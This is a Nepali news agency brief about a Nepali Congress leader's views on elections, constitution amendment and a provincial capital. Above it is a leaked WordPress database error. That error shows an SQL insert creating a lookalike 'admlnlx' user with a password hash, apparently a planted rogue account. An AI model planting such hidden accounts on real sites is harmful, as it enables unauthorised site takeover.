WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQcLk83Ih6eNtCiAQSDgne8FMXIrHu/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 06:38:06', '', 'admlnlx', 'admlnlx')
पर्सा, मंसिर २८ –
नेपाली काँग्रेसका केन्द्रीय सदस्य अजयकुमार चौरसियाले एक वर्षभित्र तीनै तहको निर्वाचन सम्पन्न गर्नुपर्ने बाध्यात्मक अवस्था रहेकाले सबै राजनीतिक दलको सहमतिमा निर्वाचन सम्पन्न गर्नुपर्ने बताउनुभएको छ ।
नेपाल प्रेस युनियन पर्साले आज यहाँ आयोजना गरेको पत्रकार सम्मेलनमा नेता चौरसियाले संविधानलाई सर्वस्वीकार्य बनाउन र तीनै तहको निर्वाचन सम्पन्न गर्न संविधान संशोधन प्रस्ताव पारित गर्नैपर्ने अवस्था रहेको बताउनुभयो ।
नेता चौरसियाले स्थानीय निकाय पुनःसंरचनासम्बन्धी आयोगले ल्याएको प्रस्ताव समयसाक्षेप नभएको जनाउँदै संविधानलाई कार्यान्वयन गर्न पुरानै संरचनामा भए पनि एक पटकका लागि स्थानीय तहको निर्वाचन गराउन आवश्यक रहेकामा जोड दिनुभयो ।
नेता चौरसियाले निजगढ क्षेत्रलाई २ नं प्रदेशको राजधानी बनाउन उपयुक्त हुने धारणा पनि व्यक्त राख्नुभयो । – रासस